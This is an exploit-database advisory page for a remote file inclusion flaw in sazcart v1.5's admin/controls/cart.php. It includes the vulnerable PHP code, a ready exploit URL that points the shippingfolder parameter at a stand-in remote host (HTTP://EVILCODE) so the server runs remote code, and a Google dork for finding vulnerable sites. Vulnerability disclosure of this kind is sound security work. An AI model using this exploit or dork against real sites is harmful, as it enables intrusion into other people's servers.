header-logo
Suggest Exploit
vendor:
sazcart
by:
IbnuSina
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: sazcart
Affected Version From: v1.5
Affected Version To: v1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:sazcart:sazcart:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

sazcart v1.5 (cart.php) Remote File include

A vulnerability in sazcart v1.5 allows remote attackers to include arbitrary files via a URL in the _saz[settings][shippingfolder] parameter to admin/controls/cart.php.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

sazcart v1.5 (cart.php) Remote File include
*********************---Hitamputih crew---******************************** 
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
*Risk    : High
* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
*especially thx to str0ke@milw0rm.com 
***************************************************************************
bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?
google dork: "powered by sazcart"

# milw0rm.com [2006-11-04]